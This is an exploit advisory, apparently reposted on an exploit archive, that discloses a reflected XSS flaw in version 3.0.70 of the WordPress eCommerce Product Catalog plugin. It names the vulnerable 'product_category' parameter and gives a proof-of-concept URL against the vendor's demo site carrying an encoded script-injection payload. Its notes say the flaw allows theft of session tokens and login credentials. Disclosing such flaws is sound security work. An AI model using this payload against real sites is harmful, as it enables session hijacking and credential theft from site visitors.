Advertisement
C r a C k E r
T H E C R A C K O F E T E R N A L M I G H T
From The Ashes and Dust Rises An Unimaginable Crack....
[ Exploits ]
: Author : CraCkEr :
Website : wordpress.org/plugins/ecommerce-product-catalog/
Vendor : impleCode - implecode.com
Software : WordPress eCommerce Product Catalog 3.0.70
Vuln Type: Reflected XSS
Method : GET
Impact : Manipulate the content of the site
: :
Release Notes:
The attacker can send to victim a link containing a malicious URL in an email or
instant message can perform a wide variety of actions, such as stealing the victim's
session token or login credentials
Greets:
The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL
CryptoJob (Twitter) twitter.com/CryptozJob
CraCkEr 2022
URL parameter 'product_category' is vulnerable to XSS
Path: /product-category/clothing/sunglasses/men/
https://demo.implecode.com/product-category/clothing/sunglasses/men/?product_category=40&gr0ln%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ewop2e=1
[-] Done
Copyright ©2023 Exploitalert.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.